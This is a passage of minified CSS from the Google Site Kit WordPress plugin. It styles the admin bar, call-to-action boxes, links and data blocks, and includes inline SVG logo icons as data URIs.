.googlesitekit-adminbar .googlesitekit-cta{box-sizing:border-box}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link{background-color:transparent;font-size:16px;height:auto;letter-spacing:.5px;width:max-content}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-error-cta-wrapper .mdc-button{margin-bottom:24px}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta strong{font-weight:600}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .mdc-button__label{font-weight:400;letter-spacing:1.25px}#wpadminbar.nojs .googlesitekit-noscript{border-left:4px solid #fece72;display:none;left:0;position:absolute;top:32px;width:100%}#wpadminbar.nojs .googlesitekit-wp-adminbar:hover .googlesitekit-noscript{display:block}#wpadminbar .googlesitekit-plugin.ab-sub-wrapper{left:0;width:100%}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar{box-shadow:0 1.25px 5px 0 rgba(0,0,0,.19),0 .33px 1.5px 0 rgba(0,0,0,.039);background:#fff;color:#000;left:0;padding:0;position:absolute;right:0;top:46px;z-index:9999}@media(min-width: 783px){#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar{top:32px}}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar.--has-error{display:none}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__subtitle{color:#6c726e;font-size:16px;letter-spacing:.5px}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__title{color:#333935;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:18px;font-weight:500;margin:5px 0 0}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__title .googlesitekit-adminbar__title--date-range{color:#6c726e;font-size:14px;letter-spacing:.25px}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__link{display:none}#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-data-block__datapoint--resize{font-size:inherit}#wpadminbar:not(.mobile) .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__link{display:inline-block}#wpadminbar:not(.mobile) .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__link--mobile{display:none}@media(min-width: 960px){#wpadminbar.mobile .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__link{display:inline-block}}#wpadminbar.mobile .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__link--mobile{display:inline-block;padding-left:16px;position:relative;top:-16px}@media(min-width: 960px){#wpadminbar.mobile .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-adminbar__link--mobile{display:none}}#wpadminbar.mobile .googlesitekit-plugin .googlesitekit-adminbar .mdc-layout-grid{pointer-events:none}@media(min-width: 960px){#wpadminbar.mobile .googlesitekit-plugin .googlesitekit-adminbar .mdc-layout-grid{pointer-events:auto}}#wpadminbar .googlesitekit-wp-adminbar{display:block;position:static}#wpadminbar .googlesitekit-wp-adminbar .ab-item{display:block;float:left;height:46px;position:static;width:52px}@media(min-width: 783px){#wpadminbar .googlesitekit-wp-adminbar .ab-item{height:auto;width:auto}}#wpadminbar .googlesitekit-wp-adminbar .googlesitekit-wp-adminbar__icon{background-image:url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2243%22%20height%3D%2244%22%20viewBox%3D%220%200%2043%2044%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%3Cdefs%3E%3Cpath%20d%3D%22M42.5%2018H22v8.5h11.8C32.7%2031.9%2028.1%2035%2022%2035c-7.2%200-13-5.8-13-13S14.8%209%2022%209c3.1%200%205.9%201.1%208.1%202.9l6.4-6.4C32.6%202.1%2027.6%200%2022%200%209.8%200%200%209.8%200%2022s9.8%2022%2022%2022c11%200%2021-8%2021-22%200-1.3-.2-2.7-.5-4z%22%20id%3D%22a%22%2F%3E%3C%2Fdefs%3E%3Cuse%20fill%3D%22%23FFF%22%20xlink%3Ahref%3D%22%23a%22%20fill-rule%3D%22evenodd%22%2F%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:contain;display:block;height:26px;margin:10px auto;opacity:.6;padding:0;position:relative;width:26px}@media(min-width: 783px){#wpadminbar .googlesitekit-wp-adminbar .googlesitekit-wp-adminbar__icon{float:left;height:15px;margin:8px 8px 5px 0;width:15px}}#wpadminbar .googlesitekit-wp-adminbar .googlesitekit-wp-adminbar__label{display:none}@media(min-width: 783px){#wpadminbar .googlesitekit-wp-adminbar .googlesitekit-wp-adminbar__label{display:inline}}#wpadminbar .ab-top-menu>.googlesitekit-wp-adminbar.hover>.ab-item,#wpadminbar:not(.mobile) .quicklinks .ab-top-menu>.googlesitekit-wp-adminbar:hover>.ab-item,#wpadminbar:not(.mobile) .quicklinks .ab-top-menu>.googlesitekit-wp-adminbar>.ab-item:focus,#wpadminbar.nojq .quicklinks .ab-top-menu>.googlesitekit-wp-adminbar>.ab-item:focus{background-color:#fff;color:#161b18;position:relative;z-index:10000}#wpadminbar .googlesitekit-wp-adminbar.hover .googlesitekit-wp-adminbar__icon,#wpadminbar:not(.mobile) .googlesitekit-wp-adminbar:hover .googlesitekit-wp-adminbar__icon,#wpadminbar:not(.mobile) .googlesitekit-wp-adminbar .ab-item:focus .googlesitekit-wp-adminbar__icon{background-image:url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDMiIGhlaWdodD0iNDQiIHZpZXdCb3g9IjAgMCA0MyA0NCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI+PGRlZnM+PHBhdGggZD0iTTQyLjUgMThIMjJ2OC41aDExLjhDMzIuNyAzMS45IDI4LjEgMzUgMjIgMzVjLTcuMiAwLTEzLTUuOC0xMy0xM1MxNC44IDkgMjIgOWMzLjEgMCA1LjkgMS4xIDguMSAyLjlsNi40LTYuNEMzMi42IDIuMSAyNy42IDAgMjIgMCA5LjggMCAwIDkuOCAwIDIyczkuOCAyMiAyMiAyMmMxMSAwIDIxLTggMjEtMjIgMC0xLjMtLjItMi43LS41LTR6IiBpZD0iYSIvPjwvZGVmcz48ZyBmaWxsPSJub25lIiBmaWxsLXJ1bGU9ImV2ZW5vZGQiPjxtYXNrIGlkPSJiIiBmaWxsPSIjZmZmIj48dXNlIHhsaW5rOmhyZWY9IiNhIi8+PC9tYXNrPjxwYXRoIGZpbGw9IiNGQkJDMDUiIG1hc2s9InVybCgjYikiIGQ9Ik0tMiAzNVY5bDE3IDEzeiIvPjxwYXRoIGZpbGw9IiMzNEE4NTMiIG1hc2s9InVybCgjYikiIGQ9Ik0tMiAzNWwzMC0yMyA3LjkgMUw0Ni0ydjQ4SC0yeiIvPjxwYXRoIGZpbGw9IiM0Mjg1RjQiIG1hc2s9InVybCgjYikiIGQ9Ik00NiA0NkwxNSAyMmwtNC0zTDQ2IDl6Ii8+PHBhdGggZmlsbD0iI0VBNDMzNSIgbWFzaz0idXJsKCNiKSIgZD0iTS0yIDlsMTcgMTMgNy02LjFMNDYgMTJWLTJILTJ6Ii8+PC9nPjwvc3ZnPg==);opacity:1}.googlesitekit-plugin .googlesitekit-analytics-cta,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta{--cta-analytics-gap: 16px;--cta-analytics-gap-narrow: calc(var(--cta-analytics-gap) / 2);background-color:#ebeef0;display:flex;flex-direction:column;gap:var(--cta-analytics-gap);padding:var(--cta-analytics-gap)}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta{--cta-analytics-gap: 24px;flex-direction:row-reverse}}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta--description,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta--description{color:#161b18;font-size:14px;letter-spacing:.25px;margin:0}.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-adminbar .mdc-button{margin-top:var(--cta-analytics-gap-narrow);width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-adminbar .mdc-button{width:auto}}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-adminbar .mdc-button{margin-top:var(--cta-analytics-gap)}}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-cta--activate-analytics,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-cta--activate-analytics,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs{display:flex;gap:var(--cta-analytics-gap)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph{background-color:#fff;border-radius:4px;display:flex;flex:1;flex-direction:column;padding:var(--cta-analytics-gap-narrow)}#dashboard-widgets .googlesitekit-plugin .googlesitekit-analytics-cta h3.googlesitekit-analytics-cta__preview-graph--title,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--title,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--title{color:#333935;font-size:12px;font-weight:500;letter-spacing:.2px;margin:0 0 auto;padding-bottom:var(--cta-analytics-gap-narrow)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--icons,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--icons{align-items:center;color:#cbd0d3;display:flex;gap:4px;padding-top:var(--cta-analytics-gap-narrow)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--up-arrow,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--up-arrow{height:12px}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--bar,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--bar{background-color:#cbd0d3;border-radius:5px;height:8px;width:24px}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__details,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-analytics-cta .googlesitekit-analytics-cta__details{flex:1}}.googlesitekit-plugin .googlesitekit-change-arrow{--color-up: #46732b;--color-down: #ac4220}.googlesitekit-plugin .googlesitekit-change-arrow--inverted-color{--color-up: #ac4220;--color-down: #46732b}.googlesitekit-plugin .googlesitekit-change-arrow--up{color:var(--color-up)}.googlesitekit-plugin .googlesitekit-change-arrow--down{color:var(--color-up);transform:rotate(180deg)}.googlesitekit-plugin .googlesitekit-change-arrow--down path{fill:var(--color-down)}.googlesitekit-plugin .googlesitekit-cta,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{background-color:#ebeef0;border-radius:16px;font-size:14px;grid-column:span 3;grid-row:span 3;height:100%;letter-spacing:.25px;line-height:1.43;padding:16px;width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-cta,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{padding:24px}}.googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-cta--error,.googlesitekit-wp-dashboard #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error,#wpadminbar .googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error,.googlesitekit-wp-dashboard #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta--error{background-color:#fff}.googlesitekit-adminbar-modules .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-adminbar-modules #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,#wpadminbar .googlesitekit-adminbar-modules .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,.googlesitekit-adminbar-modules #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{padding:16px}.googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-wp-dashboard #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,#wpadminbar .googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,.googlesitekit-wp-dashboard #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{background-color:#ebeef0;box-sizing:border-box;height:auto;margin-top:12px;padding:12px}.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,#wpadminbar .googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta,.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{margin-top:0}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__title,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta .googlesitekit-cta__title,#wpadminbar .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__title{color:#161b18;font-weight:500;margin:0 0 5px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title,#wpadminbar .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-adminbar .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title{font-weight:700;letter-spacing:.5px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta .googlesitekit-cta__description,#wpadminbar .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar .googlesitekit-cta__description,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description{color:#161b18;margin:0 0 20px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description p:first-child,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta .googlesitekit-cta__description p:first-child,#wpadminbar .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar .googlesitekit-cta__description p:first-child,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description p:first-child{margin-top:0}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error.googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error{background-color:#ffded3}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error a,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error.googlesitekit-cta a,.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__title,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error.googlesitekit-cta .googlesitekit-cta__title,#wpadminbar .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-adminbar .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error a,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__title{color:#7a1e00}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__description,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error.googlesitekit-cta .googlesitekit-cta__description,#wpadminbar .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-adminbar .googlesitekit-cta__description,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__description{color:#7a1e00;word-break:break-word}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .mdc-button:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error.googlesitekit-cta .mdc-button:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-adminbar .mdc-button:not(:disabled),#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .mdc-button:not(:disabled){background-color:#ac4220;color:#fff}.googlesitekit-plugin .googlesitekit-cta *:last-child,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta *:last-child,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta *:last-child{margin-bottom:0}.googlesitekit-wp-dashboard .googlesitekit-cta--error,.googlesitekit-wp-dashboard #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta--error,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-wp-dashboard .googlesitekit-cta--error{margin-top:12px}.googlesitekit-cta-link,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link{align-items:center;cursor:pointer;display:inline-flex;font-family:inherit;font-size:inherit;font-weight:inherit;padding:0;text-align:left;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-cta-link svg,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link svg{fill:currentColor}.googlesitekit-cta-link:hover svg,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link:hover svg{fill:currentColor}.googlesitekit-page .googlesitekit-cta-link,.googlesitekit-page #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-page .googlesitekit-cta-link{color:#108080}.googlesitekit-page .googlesitekit-cta-link:hover,.googlesitekit-page #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-page .googlesitekit-cta-link:hover{color:#108080;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-cta-link.googlesitekit-cta-link--secondary,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--secondary.googlesitekit-cta-link{color:#108080}.googlesitekit-cta-link.googlesitekit-cta-link--secondary svg,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--secondary.googlesitekit-cta-link svg{fill:currentColor}.googlesitekit-cta-link.googlesitekit-cta-link--secondary:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--secondary.googlesitekit-cta-link:hover{color:#108080}.googlesitekit-cta-link.googlesitekit-cta-link--secondary:hover svg,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--secondary.googlesitekit-cta-link:hover svg{fill:currentColor}.googlesitekit-cta-link.googlesitekit-cta-link--caps,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--caps.googlesitekit-cta-link{text-transform:uppercase}.googlesitekit-cta-link.googlesitekit-cta-link--danger,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--danger.googlesitekit-cta-link{color:#ac4220}.googlesitekit-cta-link.googlesitekit-cta-link--small,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--small.googlesitekit-cta-link{font-size:12px;letter-spacing:.2px}.googlesitekit-cta-link.googlesitekit-cta-link--standalone,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--standalone.googlesitekit-cta-link{display:flex}.googlesitekit-cta-link.googlesitekit-cta-link--inverse,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--inverse.googlesitekit-cta-link{color:#fff}.googlesitekit-cta-link.googlesitekit-cta-link--inverse:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--inverse.googlesitekit-cta-link:hover{color:#fff}.googlesitekit-cta-link.googlesitekit-cta-link--disabled,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--disabled.googlesitekit-cta-link{color:#b8bdb9;cursor:default}.googlesitekit-cta-link.googlesitekit-cta-link--danger:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--danger.googlesitekit-cta-link:hover{color:#ac4220}.googlesitekit-cta-link.googlesitekit-cta-link--disabled:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--disabled.googlesitekit-cta-link:hover{color:#b8bdb9;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-cta-link.googlesitekit-cta-link--no-flex,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .googlesitekit-cta-link--no-flex.googlesitekit-cta-link{display:inline}button.googlesitekit-cta-link,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar button.googlesitekit-cta-link{color:#3c7251}button.googlesitekit-cta-link svg,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar button.googlesitekit-cta-link svg{fill:currentColor}button.googlesitekit-cta-link:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar button.googlesitekit-cta-link:hover{color:#2e5f41}button.googlesitekit-cta-link:hover svg,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar button.googlesitekit-cta-link:hover svg{fill:currentColor}button.googlesitekit-cta-link--link-button{padding:2px 10px}button.googlesitekit-cta-link--link-button:focus{background-color:rgba(60,114,81,.08);outline:none}button.googlesitekit-cta-link--link-button.googlesitekit-cta-link--secondary:focus{background-color:rgba(16,128,128,.08)}.googlesitekit-data-block,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block{--color-up: #46732b;--color-down: #ac4220;position:relative;text-align:left}.post-php .googlesitekit-data-block,.post-php #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block,#wpadminbar .googlesitekit-adminbar .post-php .googlesitekit-data-block{min-width:150px}.googlesitekit-wp-dashboard .googlesitekit-data-block,.googlesitekit-wp-dashboard #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block,#wpadminbar .googlesitekit-adminbar .googlesitekit-wp-dashboard .googlesitekit-data-block{padding-top:12px}.googlesitekit-data-block .googlesitekit-data-block__title,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__title{align-items:flex-start;color:#6c726e;display:flex;flex:1;flex-direction:column;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:700;justify-content:flex-start;margin:0 0 12px;row-gap:8px}.googlesitekit-data-block .googlesitekit-data-block__title .googlesitekit-new-badge,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title .googlesitekit-new-badge,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__title .googlesitekit-new-badge{margin-left:0}.googlesitekit-data-block.googlesitekit-data-block--button .googlesitekit-data-block__title,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block--button.googlesitekit-data-block .googlesitekit-data-block__title,.googlesitekit-data-block.googlesitekit-data-block--button #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__title{align-items:center}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title{font-size:16px;font-weight:700;letter-spacing:.5px;margin-bottom:5px}#dashboard-widgets .googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__title{font-size:12px;letter-spacing:.2px}.googlesitekit-data-block .googlesitekit-data-block__title-inner,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title-inner{align-items:center;display:flex;flex:1}.googlesitekit-data-block .googlesitekit-data-block__title-datapoint-wrapper,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title-datapoint-wrapper{display:flex;flex:1;flex-flow:column}.googlesitekit-data-block .googlesitekit-data-block__datapoint,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__datapoint,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__datapoint{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:46px;font-weight:500;line-height:1.13;margin:0;text-wrap:nowrap}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__datapoint,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__datapoint{display:inline-block;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:38px;line-height:1.158;margin-right:5px}.googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__datapoint,.googlesitekit-wp-dashboard #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__datapoint,#wpadminbar .googlesitekit-adminbar .googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__datapoint,.googlesitekit-wp-dashboard .googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__datapoint{font-size:32px}.googlesitekit-data-block .googlesitekit-data-block__change,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__change{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1;margin-top:16px;text-transform:none}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change{display:inline-block;font-size:16px;letter-spacing:.5px;margin-top:0}.googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__change,.googlesitekit-wp-dashboard #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change,#wpadminbar .googlesitekit-adminbar .googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__change,.googlesitekit-wp-dashboard .googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__change{margin-top:10px}.googlesitekit-data-block .googlesitekit-data-block__change--no-change,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change--no-change{visibility:hidden}.googlesitekit-data-block .googlesitekit-data-block__sparkline,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__sparkline,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__sparkline{margin-top:8px;max-width:150px}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__sparkline,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__sparkline{display:none}.googlesitekit-data-block .googlesitekit-data-block__arrow,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__arrow,.googlesitekit-data-block #wpadminbar .googlesitekit-adminbar .googlesitekit-data-block__arrow{display:inline-block;line-height:1;margin-right:2px;vertical-align:baseline}.googlesitekit-data-block .googlesitekit-data-block__arrow--reverse,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__arrow--reverse{transform:rotate(180deg)}#wpadminbar .googlesitekit-data-block .googlesitekit-data-block__arrow .svg{height:9px;width:9px}.googlesitekit-data-block .googlesitekit-data-block__suffix,#wpadminbar .googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix{margin-left:4px}.googlesitekit-data-block 